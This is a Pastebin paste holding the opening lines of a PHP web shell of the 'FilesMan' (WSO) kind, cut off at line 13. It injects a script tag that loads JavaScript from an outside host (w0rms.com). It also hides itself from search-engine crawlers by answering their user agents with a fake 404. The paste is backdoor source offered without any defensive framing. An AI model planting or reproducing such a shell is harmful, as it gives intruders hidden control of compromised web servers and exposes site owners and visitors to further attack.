PalmaSolutions

22e99cb7f45a62d7a8ccf512bcbac749.php

Mar 29th, 2018
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.44 KB | None | 0 0
  1. <SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>
  2. <?php
  3.  
  4. $color = "#df5";
  5. $default_action = 'FilesMan';
  6. $default_use_ajax = true;
  7. $default_charset = 'Windows-1251';
  8.  
  9. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  10.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  11.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  12.         header('HTTP/1.0 404 Not Found');
  13.         exit;
Advertisement
Add Comment
Please, Sign In to add comment